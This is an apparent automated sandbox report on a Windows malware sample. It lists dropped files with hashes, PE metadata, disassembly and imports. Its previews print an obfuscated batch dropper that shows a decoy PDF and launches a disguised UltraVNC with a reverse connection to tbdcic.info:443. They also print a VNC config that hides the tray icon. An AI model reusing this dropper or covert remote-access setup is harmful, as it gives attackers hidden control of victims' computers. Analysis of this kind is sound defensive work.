Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.404621101841537
Encrypted:	false
SSDEEP:	192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbxcbiIMScb5:V3fOCIdJDe0MB
MD5:	4F857A15020F7422960C8F4BAE0846B4
SHA1:	4DBFE5AD2CB09371A52986FF473E00F68E6F7A0A
SHA-256:	FAC98ECE89F4E799C0CA4438EADB5708D2237F0B2934773978D1B69526CEEC51
SHA-512:	1EC22724D032E7D8812F97DFDC271DBE4D7E7F6735459C2BBEA36689FEDFA9492606D113D1AACEC6D535F0D9602EA613905672236F3F32301604DC3CA9DB5181
Malicious:	false
Preview:	05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : *************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***********************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-

C:\Users\user\Downloads\Lom.pdf

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PDF document, version 1.5 (zip deflate encoded)
Category:	dropped
Size (bytes):	605114
Entropy (8bit):	7.931189302613814
Encrypted:	false
SSDEEP:	12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
MD5:	A18D0E3EEEF0D6E099BAB52F8B041446
SHA1:	4879750BEC07AA11629950310AF538E9A9D91D20
SHA-256:	95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
SHA-512:	6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
Malicious:	false
Preview:	%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:\|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi.....T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

C:\Windows\Tasks\5482310161066753

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	5.5415018235723945
Encrypted:	false
SSDEEP:	24:gDo8Dlr0RMqL0LtvJW2urcW1SalC/ki2wpx/m:aEb2AhFWx/m
MD5:	651796E1EB5F2C51A6DD6929A65184DA
SHA1:	C475C14C2D71453126FBDE6E135C4B68801A0E9F
SHA-256:	8F0E40CBAAA9C09FA66C18BB90B54FD373EAEF4328E166EB5D0A3EE036F8DD49
SHA-512:	C76F34CD8F7BC54A2D229B6DE8C0899FD676DB75001BAF0A7394655BE85CCE65539D3B7D1565A2381ADECF851615B9A989C9D83B22B6732BA4272026D9D8454F
Malicious:	false
Preview:	@echo off.setlocal enabledelayedexpansion.set dLblEw=nhost.set H9zjF6=nne.set Ely6ya=co.set rsZWbB=exe.set e2uPdm=Lom.set RscJfa=pdf.set DE4CBb=raVNC.set jq2jOU=%COMPUTERNAME%.set q6noQx=autore.set WWfq61=%WINDIR%\Tasks\698563441.cmd.set AMDK6l=tbdcic.info.set qC9Ryl=Thj0Wf.set eUynLD=443.set uTrzGi=co.set ayToqv=ct.set nM9rdS=Ult.set TfRayV=sync_browser.set erudre=ini.timeout /t 1.copy "gTFLK1.jBd3Ei" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%" & start "" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%".timeout /t 1.taskkill /f /im %TfRayV%.%rsZWbB% .timeout /t 2.copy "GIjul8.QTIrrr" "%TfRayV%.%rsZWbB%".timeout /t 1.copy "CEpr8q.li7XUg" "%nM9rdS%%DE4CBb%.%erudre%".timeout /t 2.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% .timeout /t 8.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% -%q6noQx%%Ely6ya%%H9zjF6%%ayToqv% -id:%jq2jOU%_%qC9Ryl% -%Ely6ya%%H9zjF6%%ayToqv% %AMDK6l%:%eUynLD%.timeout /t 2.copy "sdABZ4.E1924R" "%uTrzGi%%dLblEw%.%rsZWbB%".timeout /t 4.:loop.if exist "%WWfq61%" (. cmd /c "%WWfq61%". tim

C:\Windows\Tasks\5482310161066753.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	5.5415018235723945
Encrypted:	false
SSDEEP:	24:gDo8Dlr0RMqL0LtvJW2urcW1SalC/ki2wpx/m:aEb2AhFWx/m
MD5:	651796E1EB5F2C51A6DD6929A65184DA
SHA1:	C475C14C2D71453126FBDE6E135C4B68801A0E9F
SHA-256:	8F0E40CBAAA9C09FA66C18BB90B54FD373EAEF4328E166EB5D0A3EE036F8DD49
SHA-512:	C76F34CD8F7BC54A2D229B6DE8C0899FD676DB75001BAF0A7394655BE85CCE65539D3B7D1565A2381ADECF851615B9A989C9D83B22B6732BA4272026D9D8454F
Malicious:	false
Preview:	@echo off.setlocal enabledelayedexpansion.set dLblEw=nhost.set H9zjF6=nne.set Ely6ya=co.set rsZWbB=exe.set e2uPdm=Lom.set RscJfa=pdf.set DE4CBb=raVNC.set jq2jOU=%COMPUTERNAME%.set q6noQx=autore.set WWfq61=%WINDIR%\Tasks\698563441.cmd.set AMDK6l=tbdcic.info.set qC9Ryl=Thj0Wf.set eUynLD=443.set uTrzGi=co.set ayToqv=ct.set nM9rdS=Ult.set TfRayV=sync_browser.set erudre=ini.timeout /t 1.copy "gTFLK1.jBd3Ei" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%" & start "" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%".timeout /t 1.taskkill /f /im %TfRayV%.%rsZWbB% .timeout /t 2.copy "GIjul8.QTIrrr" "%TfRayV%.%rsZWbB%".timeout /t 1.copy "CEpr8q.li7XUg" "%nM9rdS%%DE4CBb%.%erudre%".timeout /t 2.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% .timeout /t 8.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% -%q6noQx%%Ely6ya%%H9zjF6%%ayToqv% -id:%jq2jOU%_%qC9Ryl% -%Ely6ya%%H9zjF6%%ayToqv% %AMDK6l%:%eUynLD%.timeout /t 2.copy "sdABZ4.E1924R" "%uTrzGi%%dLblEw%.%rsZWbB%".timeout /t 4.:loop.if exist "%WWfq61%" (. cmd /c "%WWfq61%". tim

C:\Windows\Tasks\CEpr8q.li7XUg

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	Generic INItialization configuration [admin]
Category:	dropped
Size (bytes):	858
Entropy (8bit):	5.216893826927931
Encrypted:	false
SSDEEP:	24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
MD5:	7EB58E0D2316B8ECE029C804BF4BA8FA
SHA1:	A2A8E2518D12A53CCFCAB925C124933172044D08
SHA-256:	71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
SHA-512:	3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
Malicious:	false
Preview:	[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

C:\Windows\Tasks\GIjul8.QTIrrr

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1945368
Entropy (8bit):	6.532894678367002
Encrypted:	false
SSDEEP:	24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
MD5:	749B3A68B9C5325D592822EE7C2C17EC
SHA1:	3EDE6BB2DF969432358A5883CF226971FDE8B7D4
SHA-256:	F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
SHA-512:	B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\GIjul8.QTIrrr, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......\|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......\|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

C:\Windows\Tasks\UltraVNC.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	Generic INItialization configuration [admin]
Category:	dropped
Size (bytes):	858
Entropy (8bit):	5.216893826927931
Encrypted:	false
SSDEEP:	24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
MD5:	7EB58E0D2316B8ECE029C804BF4BA8FA
SHA1:	A2A8E2518D12A53CCFCAB925C124933172044D08
SHA-256:	71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
SHA-512:	3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
Malicious:	false
Preview:	[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

C:\Windows\Tasks\conhost.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	867840
Entropy (8bit):	6.386550733462827
Encrypted:	false
SSDEEP:	12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
MD5:	0F568F6C821565AB9FF45C7457953789
SHA1:	F948A4C5E01A74B17D0F966615834BA76DC1BADC
SHA-256:	CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
SHA-512:	B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

C:\Windows\Tasks\gTFLK1.jBd3Ei

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PDF document, version 1.5 (zip deflate encoded)
Category:	dropped
Size (bytes):	605114
Entropy (8bit):	7.931189302613814
Encrypted:	false
SSDEEP:	12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
MD5:	A18D0E3EEEF0D6E099BAB52F8B041446
SHA1:	4879750BEC07AA11629950310AF538E9A9D91D20
SHA-256:	95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
SHA-512:	6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
Malicious:	false
Preview:	%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:\|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi.....T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

C:\Windows\Tasks\sdABZ4.E1924R

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	867840
Entropy (8bit):	6.386550733462827
Encrypted:	false
SSDEEP:	12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
MD5:	0F568F6C821565AB9FF45C7457953789
SHA1:	F948A4C5E01A74B17D0F966615834BA76DC1BADC
SHA-256:	CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
SHA-512:	B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

C:\Windows\Tasks\sync_browser.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1945368
Entropy (8bit):	6.532894678367002
Encrypted:	false
SSDEEP:	24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
MD5:	749B3A68B9C5325D592822EE7C2C17EC
SHA1:	3EDE6BB2DF969432358A5883CF226971FDE8B7D4
SHA-256:	F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
SHA-512:	B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......\|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......\|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.954883444349583
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Olz7TmvkEW.exe
File size:	1'641'047 bytes
MD5:	539b0fc32045de3013d00850827654aa
SHA1:	eed973e0a66dab8e80a1403acd7beab580c34f94
SHA256:	cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651
SHA512:	8a8cde6a373509f8d535724dee8838548dfd05ad322141b8b3ccd2a30e9a3a479228e453f222792768b982ccd14c27848518add32a425e7d358041429ab3bb66
SSDEEP:	24576:WKWs4j30INmn7r9693wUGl1wuXIF1YPQx2zgWzyMZuAZnzF77/voe2D7UGxxy+vY:TFg30I8n7r+FGl+ua1vTWzzlzZoe2DNG
TLSH:	20752340B6C3C9F5ED53327618F1AD17BBB2ED290B50158F728CFA123930646A52BA77
File Content Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...-..P.................2...H....../8.......P....@.........................................................................$s.............................

File Icon


Icon Hash:	357561d6dad24d55

Static PE Info

General

Entrypoint:	0x41382f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x50E0002D [Sun Dec 30 08:49:49 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1d1577d864d2da06952f7affd8635371

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00416E98h
push 004139C0h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [004151DCh]
pop ecx
or dword ptr [0041B9E4h], FFFFFFFFh
or dword ptr [0041B9E8h], FFFFFFFFh
call dword ptr [004151E0h]
mov ecx, dword ptr [004199C4h]
mov dword ptr [eax], ecx
call dword ptr [004151E4h]
mov ecx, dword ptr [004199C0h]
mov dword ptr [eax], ecx
mov eax, dword ptr [004151E8h]
mov eax, dword ptr [eax]
mov dword ptr [0041B9E0h], eax
call 00007FD45C51E002h
cmp dword ptr [00419780h], ebx
jne 00007FD45C51DEEEh
push 004139B8h
call dword ptr [004151ECh]
pop ecx
call 00007FD45C51DFD4h
push 00419050h
push 0041904Ch
call 00007FD45C51DFBFh
mov eax, dword ptr [004199BCh]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [004199B8h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [004151F4h]
push 00419048h
push 00419000h
call 00007FD45C51DF8Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17324	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1c000	0x309f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x364	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x130f0	0x13200	a86014994324ad6f47bddf386fd89176	False	0.6081495098039216	data	6.614408281478693	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x3560	0x3600	9abc217bd20b39b1db2f57ddf9bc789c	False	0.4381510416666667	data	5.5938980842785995	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x29ec	0x800	4c129856aeef51c872b4a2f6db01e9bd	False	0.44580078125	data	3.8126171673069433	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1c000	0x309f0	0x30a00	2a495bc4a21e28ce1bddf325b402c213	False	0.7838658820694088	data	7.467752676575126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1c280	0x18de	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Russian	Russia	0.9696826892868363
RT_ICON	0x1db60	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Russian	Russia	0.08974964572508266
RT_ICON	0x21d88	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Russian	Russia	0.12935684647302906
RT_ICON	0x24330	0x1a68	Device independent bitmap graphic, 40 x 80 x 32, image size 6720	Russian	Russia	0.16553254437869822
RT_ICON	0x25d98	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Russian	Russia	0.21106941838649157
RT_ICON	0x26e40	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Russian	Russia	0.29508196721311475
RT_ICON	0x277c8	0x6b8	Device independent bitmap graphic, 20 x 40 x 32, image size 1680	Russian	Russia	0.33313953488372094
RT_ICON	0x27e80	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Russian	Russia	0.4592198581560284
RT_GROUP_ICON	0x282e8	0x76	data	Russian	Russia	0.7457627118644068
RT_VERSION	0x28360	0x350	data			0.4693396226415094
RT_MANIFEST	0x286b0	0x33c	ASCII text, with CRLF line terminators	English	United States	0.501207729468599

Imports

DLL	Import
COMCTL32.dll
SHELL32.dll	SHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
GDI32.dll	CreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
ADVAPI32.dll	FreeSid, AllocateAndInitializeSid, CheckTokenMembership
USER32.dll	GetMenu, SetWindowPos, GetWindowDC, ReleaseDC, CopyImage, GetKeyState, GetWindowRect, ScreenToClient, GetWindowLongW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, EndDialog, SendMessageW, wsprintfW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, CreateWindowExW, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, MessageBoxA, GetParent
ole32.dll	CreateStreamOnHGlobal, CoCreateInstance, CoInitialize
OLEAUT32.dll	SysAllocString, VariantClear, OleLoadPicture
KERNEL32.dll	SetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, 